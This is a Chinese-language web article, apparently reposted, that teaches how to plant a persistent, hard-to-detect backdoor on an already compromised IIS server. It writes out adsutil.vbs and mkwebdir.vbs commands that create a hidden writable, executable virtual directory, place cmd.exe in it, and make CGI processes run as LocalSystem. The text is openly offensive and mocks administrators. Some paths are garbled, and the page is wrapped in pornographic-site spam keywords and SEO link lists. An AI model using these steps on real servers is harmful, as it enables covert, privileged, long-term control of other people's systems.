成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

真正的IIS永遠的后門解密

安全 數據安全
IIS是比較流行的www服務器,設置不當漏洞就很多。入侵iis服務器后留下后門,以后就可以隨時控制。一般的后門程序都是打開一個特殊的端口來監聽,比如有nc,ntlm,rnc等等都是以一種類telnet的方式在服務器端監聽遠程的連接控制。

IIS是比較流行的www服務器,設置不當漏洞就很多。入侵iis服務器后留下后門,以后就可以隨時控制。一般的后門程序都是打開一個特殊的端口來監聽,比如有nc,ntlm,rnc等等都是以一種類telnet的方式在服務器端監聽遠程的連接控制。不過一個比較防范嚴密的www站點(他們的管理員吃了苦頭后)一般通過防火墻對端口進行限制,這樣除了管理員開的端口外,其他端口就不能連接了。但是80端口是不可能關閉的(如果管理員沒有吃錯藥)。那么我們可以通過在80端口留后門,來開啟永遠的后門。

當IIS啟動CGI應用程序時,缺省用CreateProcessAsUser API來創建該CGI的新Process,該程序的安全上下文就由啟動該CGI的用戶決定。一般匿名用戶都映射到IUSR_computername這個賬號,當然可以由管理員改為其他的用戶。或者由瀏覽器提供一個合法的用戶。兩者的用戶的權限都是比較低,可能都屬于guest組的成員。其實我們可以修改iis開啟CGI的方式,來提高權限。我們來看iis主進程本身是運行在localsystem賬號下的,所以我們就可以得到最高localsystem的權限。

入侵web服務器后,一般都可以綁定一個cmd到一個端口來遠程控制該服務器。這時可以有GUI的遠程控制,比如338Array,或者類telnet text方式的控制,比如rnc。nc肯定是可以用的,其實這也足夠了。

1. telnet到服務器

 

  1. 2. cscript.exe adsutil.vbs enum w3svc/1/root  
  2.  
  3. KeyType : (STRING) "IIsWebVirtualDir"  
  4.  
  5. AppRoot : (STRING) "/LM/W3SVC/1/ROOT"  
  6.  
  7. AppFriendlyName : (STRING) "默認應用程序"  
  8.  
  9. AppIsolated : (INTEGER) 2  
  10.  
  11. AccessRead : (BOOLEAN) True  
  12.  
  13. AccessWrite : (BOOLEAN) False  
  14.  
  15. AccessExecute : (BOOLEAN) False  
  16.  
  17. AccessScript : (BOOLEAN) True  
  18.  
  19. AccessSource : (BOOLEAN) False  
  20.  
  21. AccessNoRemoteRead : (BOOLEAN) False  
  22.  
  23. AccessNoRemoteWrite : (BOOLEAN) False  
  24.  
  25. AccessNoRemoteExecute : (BOOLEAN) False  
  26.  
  27. AccessNoRemoteScript : (BOOLEAN) False 

 

 

  1. HttpErrors : (LIST) (32 Items)  
  2.  
  3. "400,*,FILE,C:WINNThelpiisHelpcommon400.htm"  
  4.  
  5. "401,1,FILE,C:WINNThelpiisHelpcommon401-1.htm"  
  6.  
  7. "401,2,FILE,C:WINNThelpiisHelpcommon401-2.htm"  
  8.  
  9. "401,3,FILE,C:WINNThelpiisHelpcommon401-3.htm"  
  10.  
  11. "401,4,FILE,C:WINNThelpiisHelpcommon401-4.htm"  
  12.  
  13. "401,5,FILE,C:WINNThelpiisHelpcommon401-5.htm" 

 

 

  1. FrontPageWeb : (BOOLEAN) True  
  2.  
  3. Path : (STRING) "c:inetpubwwwroot"  
  4.  
  5. AccessFlags : (INTEGER) 513  
  6.  
  7. [/w3svc/1/root/localstart.asp]  
  8.  
  9. [/w3svc/1/root/_vti_pvt]  
  10.  
  11. [/w3svc/1/root/_vti_log]  
  12.  
  13. [/w3svc/1/root/_private]  
  14.  
  15. [/w3svc/1/root/_vti_txt]  
  16.  
  17. [/w3svc/1/root/_vti_script]  
  18.  
  19. [/w3svc/1/root/_vti_cnf]  
  20.  
  21. [/w3svc/1/root/_vti_bin] 

 

不要告訴我你不知道上面的輸出是什么!現在我們心里已經有底了,是不是!呵呵 管理員要倒霉了

  1. 3. mkdir c:inetpubwwwrootdir1  
  2.  
  3. 4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:inetpubwwwrootdir1" 

 

這樣就建好了一個虛目錄:Virtual Dir1,你可以用 1 的命令看一下

5. 接下來要改變一下Virtual Dir1的屬性為execute

 

  1. cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:  
  2.  
  3. cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s: 

 

現在你已經可以upload 內容到該目錄,并且可以運行。你也可以把cmd.exe net.exe直接拷貝到虛擬目錄的磁盤目錄中。 bitsCN_com

6. 以下命令通過修改iis metabase 來迫使iis以本身的安全環境來創建新的CGI process

 

  1. Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false  
  2.  
  3. 注釋:cscript windows script host. bitscn.com  
  4.  
  5. adsutil.vbs windows iis administration script  
  6.  
  7. 后面是 iis metabase path 

 

這樣的后門幾乎是無法查出來的,除非把所有的虛目錄察看一遍

 

  1. "403,1,FILE,C:WINNThelpiisHelpcommon403-1.htm"  
  2.  
  3. "403,2,FILE,C:WINNThelpiisHelpcommon403-2.htm"  
  4.  
  5. "403,3,FILE,C:WINNThelpiisHelpcommon403-3.htm"  
  6.  
  7. "403,4,FILE,C:WINNThelpiisHelpcommon403-4.htm"  
  8.  
  9. "403,5,FILE,C:WINNThelpiisHelpcommon403-5.htm"  
  10.  
  11. "403,6,FILE,C:WINNThelpiisHelpcommon403-6.htm"  
  12.  
  13. "403,7,FILE,C:WINNThelpiisHelpcommon403-7.htm"  
  14.  
  15. "403,8,FILE,C:WINNThelpiisHelpcommon403-8.htm"  
  16.  
  17. "403,Array,FILE,C:WINNThelpiisHelpcommon403-Array.htm"  
  18.  
  19. "403,10,FILE,C:WINNThelpiisHelpcommon403-10.htm"  
  20.  
  21. "403,11,FILE,C:WINNThelpiisHelpcommon403-11.htm"  
  22.  
  23. "403,12,FILE,C:WINNThelpiisHelpcommon403-12.htm"  
  24.  
  25. "403,13,FILE,C:WINNThelpiisHelpcommon403-13.htm"  
  26.  
  27. "403,15,FILE,C:WINNThelpiisHelpcommon403-15.htm"  
  28.  
  29. "403,16,FILE,C:WINNThelpiisHelpcommon403-16.htm"  
  30.  
  31. "403,17,FILE,C:WINNThelpiisHelpcommon403-17.htm" "404,*,FILE,C:WINNThelpiisHelpcommon404b.htm"  
  32.  
  33. "405,*,FILE,C:WINNThelpiisHelpcommon405.htm"  
  34.  
  35. "406,*,FILE,C:WINNThelpiisHelpcommon406.htm"  
  36.  
  37. "407,*,FILE,C:WINNThelpiisHelpcommon407.htm"  
  38.  
  39. "412,*,FILE,C:WINNThelpiisHelpcommon412.htm"  
  40.  
  41. "414,*,FILE,C:WINNThelpiisHelpcommon414.htm"  
  42.  
  43. "500,12,FILE,C:WINNThelpiisHelpcommon500-12.htm"  
  44.  
  45. "500,13,FILE,C:WINNThelpiisHelpcommon500-13.htm"  
  46.  
  47. "500,15,FILE,C:WINNThelpiisHelpcommon500-15.htm"  
  48.  
  49. "500,100,URL,/iisHelp/common/500-100.asp" 

IIS的后門解密就為大家介紹完了,希望大家已經掌握。

【編輯推薦】

  1. 詳細解析數據加密
  2. 內部網中的密碼管理
  3. 探討ECC加密被破譯的可能性
  4. 信息安全的核心之密碼技術 上
責任編輯:佚名 來源: 網絡轉載
相關推薦

2021-01-22 16:02:29

加密貨幣數字貨幣瑞銀

2016-09-19 08:57:48

2011-11-14 13:35:25

云存儲云計算

2020-02-20 10:50:30

多數人不會真正成功

2016-01-18 10:49:51

浪潮SAP

2011-11-25 15:34:33

2023-01-06 08:42:02

學習訓練

2022-07-27 11:26:56

惡意軟件漏洞網絡攻擊

2014-11-25 09:44:43

SDN

2015-09-01 10:29:44

數據安全

2021-07-14 08:00:12

DubboRSocket 協議

2011-02-22 13:32:03

2014-03-06 17:52:25

2018-01-11 09:51:34

2010-09-29 15:20:29

2010-09-13 14:34:55

2013-11-06 10:12:26

2019-07-31 08:30:24

物聯網電池能源

2010-05-19 19:10:42

2016-10-17 09:20:20

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 精品日韩一区 | 欧美v在线观看 | 国产精品视频网 | 在线观看亚洲 | 久久黄网 | 国产成人精品久久二区二区 | 精品亚洲一区二区三区 | 亚洲精品国产第一综合99久久 | 黄色毛片一级 | 激情综合五月 | 亚洲国产一区二区视频 | 国产精品久久一区二区三区 | a级片在线观看 | 一区二区三区视频免费看 | 精品国产欧美一区二区三区不卡 | 国产91久久精品一区二区 | 一级片在线观看 | 国产精品激情 | 日韩成人一区 | 色婷婷国产精品综合在线观看 | 在线国产一区二区三区 | 亚洲一区二区综合 | 亚洲精品大片 | 午夜影院在线观看 | 日本精品视频一区二区 | 亚洲精品一区二三区不卡 | 久久中文一区二区 | 久久久久亚洲精品 | 久久久精品视 | 成人精品啪啪欧美成 | 成人3d动漫一区二区三区91 | 黑人精品欧美一区二区蜜桃 | 精品国产网 | 国产精品不卡 | 伦理一区二区 | 一本一道久久a久久精品蜜桃 | av在线电影网| 欧美一区二区三区大片 | 欧美一区二区三区免费电影 | 欧洲av在线 | 综合九九 |